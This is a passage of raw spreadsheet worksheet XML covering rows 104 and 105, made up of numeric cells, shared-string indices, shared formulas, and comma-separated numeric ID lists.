      <c r="DN104" s="108">
        <v>5.0</v>
      </c>
      <c r="DO104" s="108">
        <v>70.0</v>
      </c>
      <c r="DP104" s="101">
        <v>2100366.0</v>
      </c>
      <c r="DQ104" s="108" t="s">
        <v>1757</v>
      </c>
      <c r="DR104" s="108">
        <v>4.0</v>
      </c>
      <c r="DS104" s="108">
        <v>56.0</v>
      </c>
      <c r="DT104" s="108" t="s">
        <v>1778</v>
      </c>
      <c r="DU104" s="108">
        <v>2100366.0</v>
      </c>
      <c r="DV104" s="108" t="str">
        <f t="shared" si="154"/>
        <v>2100366, 29456, 384, 366, 408</v>
      </c>
      <c r="DW104" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX104" s="108" t="s">
        <v>1778</v>
      </c>
      <c r="DY104" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ104" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA104" s="108">
        <v>0.0</v>
      </c>
      <c r="EB104" s="108">
        <v>0.0</v>
      </c>
      <c r="EC104" s="109">
        <v>1.0</v>
      </c>
      <c r="ED104" s="109">
        <v>0.0</v>
      </c>
      <c r="EE104" s="109">
        <v>14.0</v>
      </c>
      <c r="EF104" s="109">
        <v>56.0</v>
      </c>
      <c r="EG104" s="109">
        <v>14.0</v>
      </c>
      <c r="EH104" s="109">
        <v>56.0</v>
      </c>
      <c r="EI104" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ104" s="109">
        <v>0.0</v>
      </c>
      <c r="EK104" s="109">
        <v>0.0</v>
      </c>
      <c r="EL104" s="109">
        <v>0.0</v>
      </c>
      <c r="EM104" s="109">
        <v>0.0</v>
      </c>
      <c r="EN104" s="109">
        <v>14.0</v>
      </c>
      <c r="EO104" s="109">
        <v>56.0</v>
      </c>
      <c r="EP104" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ104" s="109">
        <v>56.0</v>
      </c>
      <c r="ER104" s="110">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="ES104" s="110">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="ET104" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU104" s="110">
        <f t="shared" si="133"/>
        <v>14</v>
      </c>
      <c r="EV104" s="110">
        <f t="shared" si="134"/>
        <v>14</v>
      </c>
      <c r="EW104" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX104" s="110">
        <f t="shared" si="136"/>
        <v>56</v>
      </c>
      <c r="EY104" s="110">
        <f t="shared" si="137"/>
        <v>56</v>
      </c>
      <c r="EZ104" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA104" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB104" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC104" s="111" t="s">
        <v>1779</v>
      </c>
      <c r="FD104" s="111">
        <v>9.0</v>
      </c>
      <c r="FE104" s="111">
        <v>102.0</v>
      </c>
      <c r="FF104" s="101" t="s">
        <v>1780</v>
      </c>
      <c r="FG104" s="111" t="s">
        <v>1757</v>
      </c>
      <c r="FH104" s="111">
        <v>4.0</v>
      </c>
      <c r="FI104" s="111">
        <v>56.0</v>
      </c>
      <c r="FJ104" s="111" t="s">
        <v>1779</v>
      </c>
      <c r="FK104" s="111" t="s">
        <v>1780</v>
      </c>
      <c r="FL104" s="111" t="str">
        <f t="shared" si="155"/>
        <v>29456, 384, 366, 408, 2100366, 2100384, 2002752, 2002749, 2100408</v>
      </c>
      <c r="FM104" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN104" s="111" t="s">
        <v>1779</v>
      </c>
      <c r="FO104" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP104" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ104" s="111">
        <v>0.0</v>
      </c>
      <c r="FR104" s="111">
        <v>0.0</v>
      </c>
      <c r="FS104" s="112">
        <v>0.0</v>
      </c>
      <c r="FT104" s="112">
        <v>0.0</v>
      </c>
      <c r="FU104" s="112">
        <v>14.0</v>
      </c>
      <c r="FV104" s="112">
        <v>56.0</v>
      </c>
      <c r="FW104" s="112">
        <v>46.0</v>
      </c>
      <c r="FX104" s="112">
        <v>60.0</v>
      </c>
      <c r="FY104" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ104" s="112">
        <v>0.0</v>
      </c>
      <c r="GA104" s="112">
        <v>0.0</v>
      </c>
      <c r="GB104" s="112">
        <v>0.0</v>
      </c>
      <c r="GC104" s="112">
        <v>0.0</v>
      </c>
      <c r="GD104" s="112">
        <v>14.0</v>
      </c>
      <c r="GE104" s="112">
        <v>56.0</v>
      </c>
      <c r="GF104" s="112">
        <v>0.0</v>
      </c>
      <c r="GG104" s="112">
        <v>56.0</v>
      </c>
      <c r="GH104" s="113">
        <f t="shared" si="139"/>
        <v>0</v>
      </c>
      <c r="GI104" s="113">
        <f t="shared" si="140"/>
        <v>0</v>
      </c>
      <c r="GJ104" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK104" s="113">
        <f t="shared" si="142"/>
        <v>14</v>
      </c>
      <c r="GL104" s="113">
        <f t="shared" si="143"/>
        <v>14</v>
      </c>
      <c r="GM104" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN104" s="113">
        <f t="shared" si="145"/>
        <v>60</v>
      </c>
      <c r="GO104" s="113">
        <f t="shared" si="146"/>
        <v>56</v>
      </c>
      <c r="GP104" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ104" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR104" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS104" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT104" s="94" t="s">
        <v>1789</v>
      </c>
      <c r="GU104" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV104" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW104" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX104" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY104" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ104" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA104" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB104" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC104" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD104" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE104" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF104" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG104" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH104" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI104" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ104" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK104" s="93" t="str">
        <f t="shared" si="51"/>
        <v>NO</v>
      </c>
      <c r="HL104" s="93">
        <v>1.0</v>
      </c>
      <c r="HM104" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN104" s="93">
        <v>0.0</v>
      </c>
      <c r="HO104" s="93">
        <v>0.0</v>
      </c>
      <c r="HP104" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ104" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR104" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS104" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT104" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU104" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV104" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW104" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX104" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY104" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ104" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA104" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB104" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC104" s="120" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="ID104" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE104" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF104" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG104" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH104" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II104" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ104" s="98" t="str">
        <f t="shared" si="56"/>
        <v>NO</v>
      </c>
      <c r="IK104" s="99">
        <v>1.0</v>
      </c>
      <c r="IL104" s="99">
        <v>0.0</v>
      </c>
      <c r="IM104" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN104" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO104" s="98">
        <v>0.0</v>
      </c>
      <c r="IP104" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ104" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR104" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS104" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT104" s="127"/>
      <c r="IU104" s="127"/>
      <c r="IV104" s="127"/>
      <c r="IW104" s="127"/>
      <c r="IX104" s="127"/>
      <c r="IY104" s="127"/>
      <c r="IZ104" s="127"/>
      <c r="JA104" s="127"/>
      <c r="JB104" s="127"/>
      <c r="JC104" s="127"/>
      <c r="JD104" s="127"/>
      <c r="JE104" s="127"/>
      <c r="JF104" s="127"/>
      <c r="JG104" s="127"/>
      <c r="JH104" s="127"/>
      <c r="JI104" s="127"/>
      <c r="JJ104" s="127"/>
      <c r="JK104" s="127"/>
      <c r="JL104" s="127"/>
      <c r="JM104" s="127"/>
      <c r="JN104" s="127"/>
      <c r="JO104" s="127"/>
      <c r="JP104" s="127"/>
      <c r="JQ104" s="127"/>
      <c r="JR104" s="127"/>
      <c r="JS104" s="127"/>
      <c r="JT104" s="127"/>
      <c r="JU104" s="127"/>
      <c r="JV104" s="127"/>
      <c r="JW104" s="127"/>
      <c r="JX104" s="127"/>
      <c r="JY104" s="127"/>
      <c r="JZ104" s="127"/>
      <c r="KA104" s="127"/>
      <c r="KB104" s="127"/>
      <c r="KC104" s="127"/>
      <c r="KD104" s="127"/>
      <c r="KE104" s="127"/>
      <c r="KF104" s="127"/>
      <c r="KG104" s="127"/>
      <c r="KH104" s="127"/>
      <c r="KI104" s="127"/>
      <c r="KJ104" s="127"/>
      <c r="KK104" s="127"/>
      <c r="KL104" s="127"/>
      <c r="KM104" s="127"/>
      <c r="KN104" s="127"/>
      <c r="KO104" s="127"/>
      <c r="KP104" s="127"/>
      <c r="KQ104" s="127"/>
      <c r="KR104" s="127"/>
      <c r="KS104" s="127"/>
      <c r="KT104" s="127"/>
      <c r="KU104" s="127"/>
      <c r="KV104" s="127"/>
      <c r="KW104" s="127"/>
      <c r="KX104" s="127"/>
      <c r="KY104" s="127"/>
      <c r="KZ104" s="127"/>
      <c r="LA104" s="127"/>
      <c r="LB104" s="127"/>
      <c r="LC104" s="127"/>
      <c r="LD104" s="127"/>
      <c r="LE104" s="127"/>
      <c r="LF104" s="127"/>
      <c r="LG104" s="127"/>
      <c r="LH104" s="127"/>
      <c r="LI104" s="127"/>
      <c r="LJ104" s="127"/>
      <c r="LK104" s="127"/>
      <c r="LL104" s="127"/>
      <c r="LM104" s="127"/>
      <c r="LN104" s="127"/>
      <c r="LO104" s="127"/>
      <c r="LP104" s="127"/>
      <c r="LQ104" s="127"/>
      <c r="LR104" s="127"/>
      <c r="LS104" s="127"/>
      <c r="LT104" s="127"/>
      <c r="LU104" s="127"/>
      <c r="LV104" s="127"/>
      <c r="LW104" s="127"/>
      <c r="LX104" s="127"/>
      <c r="LY104" s="127"/>
      <c r="LZ104" s="127"/>
      <c r="MA104" s="127"/>
      <c r="MB104" s="127"/>
      <c r="MC104" s="127"/>
      <c r="MD104" s="127"/>
      <c r="ME104" s="127"/>
      <c r="MF104" s="127"/>
      <c r="MG104" s="127"/>
      <c r="MH104" s="127"/>
      <c r="MI104" s="127"/>
      <c r="MJ104" s="127"/>
      <c r="MK104" s="127"/>
      <c r="ML104" s="127"/>
      <c r="MM104" s="127"/>
      <c r="MN104" s="127"/>
      <c r="MO104" s="127"/>
      <c r="MP104" s="127"/>
      <c r="MQ104" s="127"/>
      <c r="MR104" s="127"/>
      <c r="MS104" s="127"/>
      <c r="MT104" s="127"/>
      <c r="MU104" s="127"/>
      <c r="MV104" s="127"/>
      <c r="MW104" s="127"/>
      <c r="MX104" s="127"/>
      <c r="MY104" s="127"/>
      <c r="MZ104" s="127"/>
      <c r="NA104" s="127"/>
      <c r="NB104" s="127"/>
      <c r="NC104" s="127"/>
      <c r="ND104" s="127"/>
      <c r="NE104" s="127"/>
      <c r="NF104" s="127"/>
      <c r="NG104" s="127"/>
      <c r="NH104" s="127"/>
      <c r="NI104" s="127"/>
      <c r="NJ104" s="127"/>
      <c r="NK104" s="127"/>
      <c r="NL104" s="127"/>
      <c r="NM104" s="127"/>
      <c r="NN104" s="127"/>
      <c r="NO104" s="127"/>
      <c r="NP104" s="127"/>
      <c r="NQ104" s="127"/>
      <c r="NR104" s="127"/>
      <c r="NS104" s="127"/>
      <c r="NT104" s="127"/>
      <c r="NU104" s="127"/>
      <c r="NV104" s="127"/>
      <c r="NW104" s="127"/>
      <c r="NX104" s="127"/>
      <c r="NY104" s="127"/>
    </row>
    <row r="105" ht="153.75" customHeight="1">
      <c r="B105" s="89" t="s">
        <v>244</v>
      </c>
      <c r="C105" s="90" t="s">
        <v>427</v>
      </c>
      <c r="D105" s="90" t="s">
        <v>245</v>
      </c>
      <c r="E105" s="90" t="s">
        <v>1747</v>
      </c>
      <c r="F105" s="90" t="s">
        <v>1748</v>
      </c>
      <c r="G105" s="91" t="s">
        <v>12</v>
      </c>
      <c r="H105" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I105" s="92" t="s">
        <v>1790</v>
      </c>
      <c r="J105" s="92" t="s">
        <v>1791</v>
      </c>
      <c r="K105" s="92" t="s">
        <v>1792</v>
      </c>
      <c r="L105" s="93" t="s">
        <v>1541</v>
      </c>
      <c r="M105" s="93">
        <v>2.0</v>
      </c>
      <c r="N105" s="93">
        <v>1.0</v>
      </c>
      <c r="O105" s="93">
        <v>0.0</v>
      </c>
      <c r="P105" s="93">
        <v>1.0</v>
      </c>
      <c r="Q105" s="93">
        <f t="shared" si="160"/>
        <v>1</v>
      </c>
      <c r="R105" s="93">
        <v>1.0</v>
      </c>
      <c r="S105" s="93">
        <v>0.0</v>
      </c>
      <c r="T105" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U105" s="95" t="s">
        <v>401</v>
      </c>
      <c r="V105" s="96" t="s">
        <v>1793</v>
      </c>
      <c r="W105" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X105" s="97" t="s">
        <v>1794</v>
      </c>
      <c r="Y105" s="96" t="s">
        <v>1795</v>
      </c>
      <c r="Z105" s="126" t="s">
        <v>1755</v>
      </c>
      <c r="AA105" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB105" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC105" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD105" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE105" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF105" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG105" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH105" s="99" t="s">
        <v>1796</v>
      </c>
      <c r="AI105" s="99" t="s">
        <v>481</v>
      </c>
      <c r="AJ105" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK105" s="100" t="s">
        <v>1757</v>
      </c>
      <c r="AL105" s="100">
        <v>4.0</v>
      </c>
      <c r="AM105" s="100">
        <v>108.0</v>
      </c>
      <c r="AN105" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO105" s="100" t="s">
        <v>1757</v>
      </c>
      <c r="AP105" s="100">
        <v>4.0</v>
      </c>
      <c r="AQ105" s="100">
        <v>108.0</v>
      </c>
      <c r="AR105" s="100" t="s">
        <v>1757</v>
      </c>
      <c r="AS105" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT105" s="100" t="str">
        <f t="shared" si="164"/>
        <v>29456, 384, 366, 408</v>
      </c>
      <c r="AU105" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV105" s="100" t="s">
        <v>1757</v>
      </c>
      <c r="AW105" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX105" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY105" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ105" s="100">
        <v>0.0</v>
      </c>
      <c r="BA105" s="102">
        <v>4.0</v>
      </c>
      <c r="BB105" s="102">
        <v>0.0</v>
      </c>
      <c r="BC105" s="102">
        <v>23.0</v>
      </c>
      <c r="BD105" s="102">
        <v>108.0</v>
      </c>
      <c r="BE105" s="102">
        <v>0.0</v>
      </c>
      <c r="BF105" s="102">
        <v>0.0</v>
      </c>
      <c r="BG105" s="102">
        <v>0.0</v>
      </c>
      <c r="BH105" s="102">
        <v>0.0</v>
      </c>
      <c r="BI105" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ105" s="102">
        <v>23.0</v>
      </c>
      <c r="BK105" s="102">
        <v>108.0</v>
      </c>
      <c r="BL105" s="103">
        <f t="shared" si="112"/>
        <v>0</v>
      </c>
      <c r="BM105" s="103">
        <f t="shared" si="113"/>
        <v>0</v>
      </c>
      <c r="BN105" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO105" s="103">
        <f t="shared" si="115"/>
        <v>23</v>
      </c>
      <c r="BP105" s="103">
        <f t="shared" si="116"/>
        <v>23</v>
      </c>
      <c r="BQ105" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR105" s="103">
        <f t="shared" si="118"/>
        <v>108</v>
      </c>
      <c r="BS105" s="103">
        <f t="shared" si="119"/>
        <v>108</v>
      </c>
      <c r="BT105" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU105" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV105" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW105" s="104" t="s">
        <v>1778</v>
      </c>
      <c r="BX105" s="104">
        <v>5.0</v>
      </c>
      <c r="BY105" s="104">
        <v>138.0</v>
      </c>
      <c r="BZ105" s="101">
        <v>2100366.0</v>
      </c>
      <c r="CA105" s="104" t="s">
        <v>1757</v>
      </c>
      <c r="CB105" s="104">
        <v>4.0</v>
      </c>
      <c r="CC105" s="104">
        <v>108.0</v>
      </c>
      <c r="CD105" s="104" t="s">
        <v>1778</v>
      </c>
      <c r="CE105" s="104">
        <v>2100366.0</v>
      </c>
      <c r="CF105" s="104" t="str">
        <f t="shared" si="163"/>
        <v>2100366, 29456, 384, 366, 408</v>
      </c>
      <c r="CG105" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CH105" s="104" t="s">
        <v>1778</v>
      </c>
      <c r="CI105" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CJ105" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CK105" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CL105" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CM105" s="105">
        <v>0.0</v>
      </c>
      <c r="CN105" s="105">
        <v>0.0</v>
      </c>
      <c r="CO105" s="105">
        <v>23.0</v>
      </c>
      <c r="CP105" s="105">
        <v>108.0</v>
      </c>
      <c r="CQ105" s="105">
        <v>30.0</v>
      </c>
      <c r="CR105" s="105">
        <v>108.0</v>
      </c>
      <c r="CS105" s="105">
        <v>0.0</v>
      </c>
      <c r="CT105" s="105">
        <v>0.0</v>
      </c>
      <c r="CU105" s="105">
        <v>0.0</v>
      </c>
      <c r="CV105" s="105">
        <v>0.0</v>
      </c>
      <c r="CW105" s="105">
        <v>0.0</v>
      </c>
      <c r="CX105" s="105">
        <v>23.0</v>
      </c>
      <c r="CY105" s="105">
        <v>108.0</v>
      </c>
      <c r="CZ105" s="105">
        <v>0.0</v>
      </c>
      <c r="DA105" s="105">
        <v>108.0</v>
      </c>
      <c r="DB105" s="106">
        <f t="shared" si="122"/>
        <v>0</v>
      </c>
      <c r="DC105" s="106">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="DD105" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE105" s="106">
        <f t="shared" si="125"/>
        <v>23</v>
      </c>
      <c r="DF105" s="106">
        <f t="shared" si="126"/>
        <v>23</v>
      </c>
      <c r="DG105" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH105" s="106">
        <f t="shared" si="127"/>
        <v>108</v>
      </c>
      <c r="DI105" s="106">
        <f t="shared" si="128"/>
        <v>108</v>
      </c>
      <c r="DJ105" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK105" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL105" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM105" s="108" t="s">
        <v>1778</v>
      </c>
      <c r="DN105" s="108">
        <v>5.0</v>
      </c>
      <c r="DO105" s="108">
        <v>138.0</v>
      </c>
      <c r="DP105" s="101">
        <v>2100366.0</v>
      </c>
      <c r="DQ105" s="108" t="s">
        <v>1757</v>
      </c>
      <c r="DR105" s="108">
        <v>4.0</v>
      </c>
      <c r="DS105" s="108">
        <v>108.0</v>
      </c>
      <c r="DT105" s="108" t="s">
        <v>1778</v>
      </c>
      <c r="DU105" s="108">
        <v>2100366.0</v>
      </c>
      <c r="DV105" s="108" t="str">
        <f t="shared" si="154"/>
        <v>2100366, 29456, 384, 366, 408</v>
      </c>
      <c r="DW105" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX105" s="108" t="s">
        <v>1778</v>
      </c>
      <c r="DY105" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ105" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA105" s="108">
        <v>0.0</v>
      </c>
      <c r="EB105" s="108">
        <v>0.0</v>
      </c>
      <c r="EC105" s="109">
        <v>4.0</v>
      </c>
      <c r="ED105" s="109">
        <v>0.0</v>
      </c>
      <c r="EE105" s="109">
        <v>23.0</v>
      </c>
      <c r="EF105" s="109">
        <v>108.0</v>
      </c>
      <c r="EG105" s="109">
        <v>30.0</v>
      </c>
      <c r="EH105" s="109">
        <v>108.0</v>
      </c>
      <c r="EI105" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ105" s="109">
        <v>0.0</v>
      </c>
      <c r="EK105" s="109">
        <v>0.0</v>
      </c>
      <c r="EL105" s="109">
        <v>0.0</v>
      </c>
      <c r="EM105" s="109">
        <v>0.0</v>
      </c>
      <c r="EN105" s="109">
        <v>23.0</v>
      </c>
      <c r="EO105" s="109">
        <v>108.0</v>
      </c>
      <c r="EP105" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ105" s="109">
        <v>108.0</v>
      </c>
      <c r="ER105" s="110">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="ES105" s="110">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="ET105" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU105" s="110">
        <f t="shared" si="133"/>
        <v>23</v>
      </c>
      <c r="EV105" s="110">
        <f t="shared" si="134"/>
        <v>23</v>
      </c>
      <c r="EW105" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX105" s="110">
        <f t="shared" si="136"/>
        <v>108</v>
      </c>
      <c r="EY105" s="110">
        <f t="shared" si="137"/>
        <v>108</v>
      </c>
      <c r="EZ105" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA105" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB105" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC105" s="111" t="s">
        <v>1797</v>
      </c>
      <c r="FD105" s="111">
        <v>11.0</v>
      </c>
      <c r="FE105" s="111">
        <v>204.0</v>
      </c>
      <c r="FF105" s="101" t="s">
        <v>1798</v>
      </c>
      <c r="FG105" s="111" t="s">
        <v>1757</v>
      </c>
      <c r="FH105" s="111">
        <v>4.0</v>
      </c>
      <c r="FI105" s="111">
        <v>108.0</v>
      </c>
      <c r="FJ105" s="111" t="s">
        <v>1797</v>
      </c>
      <c r="FK105" s="111" t="s">
        <v>1798</v>
      </c>
      <c r="FL105" s="111" t="str">
        <f t="shared" si="155"/>
        <v>29456, 384, 366, 408, 2100469, 2100472, 2100366, 2100384, 2002752, 2002749, 2100408</v>
      </c>
      <c r="FM105" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN105" s="111" t="s">
        <v>1797</v>
      </c>
      <c r="FO105" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP105" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ105" s="111">
        <v>0.0</v>
      </c>
      <c r="FR105" s="111">
        <v>0.0</v>
      </c>
      <c r="FS105" s="112">
        <v>0.0</v>
      </c>
      <c r="FT105" s="112">
        <v>0.0</v>
      </c>
      <c r="FU105" s="112">
        <v>35.0</v>
      </c>
      <c r="FV105" s="112">
        <v>108.0</v>
      </c>
      <c r="FW105" s="112">
        <v>96.0</v>
      </c>
      <c r="FX105" s="112">
        <v>114.0</v>
      </c>
      <c r="FY105" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ105" s="112">
        <v>0.0</v>
      </c>
      <c r="GA105" s="112">
        <v>0.0</v>
      </c>
      <c r="GB105" s="112">
        <v>0.0</v>
      </c>
      <c r="GC105" s="112">
        <v>0.0</v>
      </c>
      <c r="GD105" s="112">
        <v>23.0</v>
      </c>
      <c r="GE105" s="112">
        <v>108.0</v>
      </c>
      <c r="GF105" s="112">
        <v>0.0</v>
      </c>
      <c r="GG105" s="112">
        <v>108.0</v>
      </c>
      <c r="GH105" s="113">
        <f t="shared" si="139"/>
        <v>0</v>
      </c>
      <c r="GI105" s="113">
        <f t="shared" si="140"/>
        <v>0</v>
      </c>
      <c r="GJ105" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK105" s="113">
        <f t="shared" si="142"/>
        <v>35</v>
      </c>
      <c r="GL105" s="113">
        <f t="shared" si="143"/>
        <v>23</v>
      </c>
      <c r="GM105" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN105" s="113">
        <f t="shared" si="145"/>
        <v>114</v>
      </c>
      <c r="GO105" s="113">
        <f t="shared" si="146"/>
        <v>108</v>
      </c>
      <c r="GP105" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ105" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR105" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS105" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT105" s="94"/>
      <c r="GU105" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV105" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW105" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX105" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY105" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ105" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA105" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB105" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC105" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD105" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE105" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF105" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG105" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH105" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI105" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ105" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK105" s="93" t="str">
        <f t="shared" si="51"/>
        <v>NO</v>
      </c>
      <c r="HL105" s="93">
        <v>4.0</v>
      </c>
      <c r="HM105" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN105" s="93">
        <v>0.0</v>
      </c>
      <c r="HO105" s="93">
        <v>0.0</v>
      </c>
      <c r="HP105" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ105" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR105" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS105" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT105" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU105" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV105" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW105" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX105" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY105" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ105" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA105" s="120" t="s">
